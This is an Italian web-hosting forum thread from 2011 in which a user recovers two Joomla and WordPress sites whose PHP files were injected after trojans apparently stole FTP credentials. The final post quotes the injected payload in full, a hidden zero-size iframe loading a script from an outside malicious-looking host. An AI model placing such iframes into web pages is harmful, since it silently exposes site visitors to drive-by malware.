Buio su entrambe i domini... manutenzione?

Salve a tutti e grazie della disponibilità. Il mio problema è questo: da un paio di giorni, precisamente dal 27 aprile 2011,
quando provo ad accedere a http://primearmi.altervista.org
ricevo questo messaggio di errore:
Parse error: syntax error, unexpected '<' in /membri/primearmi/index.php on line 91

e quando provo ad accedere a http://accazzo.altervista.org
ricevo questo messaggio di errore:
Parse error: syntax error, unexpected '?' in /membri/accazzo/Hzzo/index.php on line 18

Inizialmente ho pensato che dipendesse dai lavori di manutenzione annunciati giorni fa, ma dopo due intere giornate di buio comincio un po' a preoccuparmi anche perchè non riesco (e probabilmente non posso) ad accedere alla directory /membri/ecc...

Non ho ricevuto nessuna mail dallo staff di Altervista e sul forum non ho trovato discussioni in merito a questo problema, il che mi fa pensare di essere l'unico. Per favore aiutatemi a risolvere questo down. Grazie per l'attenzione.

[dreadnaut]

Non sembra un problema tecnico, quanto un problema degli applicativi che hai installato. Se non sbaglio, il primo e' basato su joomla, ed il secondo su wordpress?

AlterBlog ed AlterSito, od installati manualmente o via pannello?

Inoltre, se via Pannello guardi il codice di quelle due pagine, cosa trovi in quelle due righe?

[Gianluca]

Sembra essere l'effetto di un worm, che potrebbe aver ricavato dal tuo pc le credenziali ftp e aver modificato quei files.

Ti converrebbe fare una scansione approfondita del o dei pc che usi per amministrare il tuo sito e poi cambiare password.

Ragazzi grazie per l'immediatezza delle risposte!
Per quanto riguarda i conflitti suggeriti da Dreadnaut aggiungo che si tratta di 2 db differenti con cui faccio delle prove sui CMS quindi non dovrebbero esserci problemi poichè Joomla risiede su primearmi.altervista, invece Wordpress è in una sotto directory di accazzo.altervista fondamentalmente da questo punto di vista mi sento tranquillo.
Sembra invece che su un pc su cui non facevo scansioni da 26 giorni, con Malwarebites pare siano entrati 2 trojan, ecco come vengono definiti:
Trojan.Hiloti preso il 22/04/2011 elemento HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\Curre ntVersion\Run | Sdonu
Trojan.Agent.U preso il 30/04/2011 elemento HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\Curre ntVersion\Run | Sdonu
Probabilmente invitati da greasmonkey, che ho utilizzato per la prima volta (e male) nelle ultime 2 settimane.
Escludo qualsiasi altra applicazione poichè windows lo uso solo per un paio di programmi di grafica ed a immagini realizzate provvedo a caricare tutto su "miosito.altervista.org/immagini/..." tramite Filezilla.
Pertanto la teoria di Gianluca è fondata.

Ora il mio problema non è tanto quello dei virus perchè sono solito formattare il pc ogni piccola magagna (dopo anni passati a risolvere problemi alla gente penso che una bella pulizia da cima a fondo sia la soluzione più rapida) forse sarebbe più rapido intervenire sulla chiave di registro, ma mi puzza perchè ho dato a Malwarebites l'incombenza di eliminarli 2 volte ma al riavvio sucessivo ho rifatto una scansione ed erano di nuovo lì, probabilmente c'è qualche file.dll che lo rimichia ma non riesco a scovarlo. (L'ignoranza è il mio peggior nemico)
Chiacchere a parte, quello che mi preoccupa è:

1_ Come rimettere in piedi i blog senza rifare tutto da capo? Premetto che conosco l'HTML il CSS, poco di PHP e praticamente niente di SQL (ho iniziato a interessarmi al web solo anno scorso quindi non ho molta esperienza).

2_ Potrei anche segare tutto, tanto gli articoli di primearmi.altervista sono riuscito a scaricarli tramite phpmyadmin e sono al sicuro inoltre ne ho una copia quasi identica su sever locale, per accazzo.altervista invece, non avendo dimestichezza con wordpress è praticamente vuoto, ho avuto solo il tempo di caricare un'immagine per il template e al massimo 2 post per provare l'editor. Ma dopo aver ripulito tutto avrei la certezza che nient'altro sia stato compromesso a parte il mio pc? Riesco a rifare i miei test come prima?

Grazie ragazzi, scusate se mi perdo in chiacchere (sarà che mi sento a mio agio). Non vorrei creare inutili pressioni, quindi non fatevi fretta a rispondere, tanto fino a domani pomeriggio sono al lavoro e non ho nessun business da difendere...

[Gianluca]

Per sistemare probabilmente ti basta aprire i rispettivi index.php e togliere la spazzatura inserita dal worm, tipicamente in fondo.

Poi ovviamente fare quello suggerito sopra per evitare che si ripeta.

Grazie ho RISOLTO!!
Seguendo il consiglio di Gianluca ho rimosso dall'ultima riga la stringa "<html><body><iframe src="http://auto7.shop.ms/stds/go.php?sid=2" width="0" height="0" frameborder="0"></iframe></body></html>" da ogni file.php infetto, è stato semplice poichè ad collegamento il sito stesso mi diceva dove fosse l'errore e quale "line" correggere.
E' la prima volta che mi imbatto in un problema simile ma per fortuna l'esperienza insegna!
Complimenti a Dreadnaut, Gianluca e a tutto lo staff, GRAZIE!